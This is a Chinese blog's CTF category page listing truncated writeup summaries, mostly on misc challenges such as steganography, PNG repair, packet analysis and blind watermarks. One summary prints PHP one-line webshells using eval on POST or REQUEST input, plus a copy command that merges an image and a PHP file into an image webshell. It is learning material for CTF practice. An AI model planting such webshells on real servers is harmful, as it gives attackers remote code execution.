随笔分类 - CTF
摘要:题目来源:WDCTF-2017 题目链接:https://adworld.xctf.org.cn/task/answer?type=misc&number=1&grade=1&id=4840&page=4 ✨writeup 下载得到rar 解压得到没有扩展名的文件 刚拿到文件时完全没有思路 参考 h
阅读全文
摘要:题目来源:WDCTF-finals-2017 题目链接:https://adworld.xctf.org.cn/task/answer?type=misc&number=1&grade=1&id=4955&page=4 ✨碎碎念 网上没找到这题的wp //也许是太简单了(?) 顺手写一份。 ✨wri
阅读全文
摘要:✨PHP一句话木马 <?php @eval($_POST["pass"]);?> <?php eval($_REQUEST["pass"]);?> 详情可浏览:Web安全-一句话木马 ✨制作图片马 1)copy命令 copy 1.png/b+1.php/a pic.php !!!不要使用powers
阅读全文
摘要:✨碎碎念 咕咕咕了好久的Pwn,临时抱佛脚入门一下。 先安利之前看的一个 Reverse+Pwn 讲解视频 讲的还是很不错的,建议耐心看完 另外感觉Reverse和Pwn都好难!! 不,CTF好难!! 之前学C的时候了解过gets()函数很危险 一般笔者会使用如下代码代替gets() scanf("
阅读全文
摘要:题目来源:SSCTF-2017 题目链接:https://adworld.xctf.org.cn/task/answer?type=misc&number=1&grade=1&id=4978&page=3 ✨碎碎念 这题挺有意思 除了第一步想不到 其他涉及知识点难度不大 但是涉及知识点比较多 多次套
阅读全文
摘要:题目来源:2019湖湘杯 题目链接:https://adworld.xctf.org.cn/task/answer?type=misc&number=1&grade=1&id=5456&page=3 ✨碎碎念 本题原题是2019湖湘杯 misc3,100分。 起初做题拿到一个表情包,后来又拿到一个表
阅读全文
摘要:✨碎碎念 CTFHub:https://www.ctfhub.com/ 笔者入门CTF时时刚开始刷的是bugku的旧平台,后来才有了CTFHub。 感觉不论是网页UI设计,还是题目质量,赛事跟踪,工具软件都做得很不错。 而且因为独到的金币制度的确让人有一种想去刷题赚金币的感觉。 个人还是非常喜欢这个
阅读全文
摘要:✨前言 这两题都是Misc中数据包的题目,一直觉得对数据包比较陌生,不知道怎么处理。 这里放两道题的wp,第一题strings命令秒杀觉得非常优秀,另外一题有涉及RSA加密与解密(本文不具体讨论RSA非对称加密算法) ✨心仪的公司writeup 题目来源:世安杯 题目链接:https://adwor
阅读全文
摘要:✨重要的事情说三遍! 请使用管理员权限执行pip install命令 请使用管理员权限执行pip install命令 请使用管理员权限执行pip install命令 ✨踩坑记录 当时一切还是从一题Misc说起 题目链接:https://adworld.xctf.org.cn/task/answer?
阅读全文
摘要:✨前言 盲水印同样是CTF Misc中极小的一个知识点,刚刚做到一题涉及到这个考点的题目。 感觉还挺有意思的,就顺便去了解了下盲水印技术。 数字水印 数字水印(Digital Watermark)一种应用计算机算法嵌入载体文件的保护信息。数字水印技术,是一种基于内容的、非密码机制的计算机信息隐藏技术
阅读全文
摘要:✨前言 今天我们想来介绍一下关于图片隐写相关处理,以及修复被修改尺寸的PNG图片。 关于PNG图片的相关处理,是CTF Misc图片隐写术中极为基础的一项操作,笔者这里是想要提一些做题过程中发现的小技巧。 ✨CTF图片处理基本套路 各种图片类型 比较常见有PNG图片,JPG图片,GIF图片。 其中G
阅读全文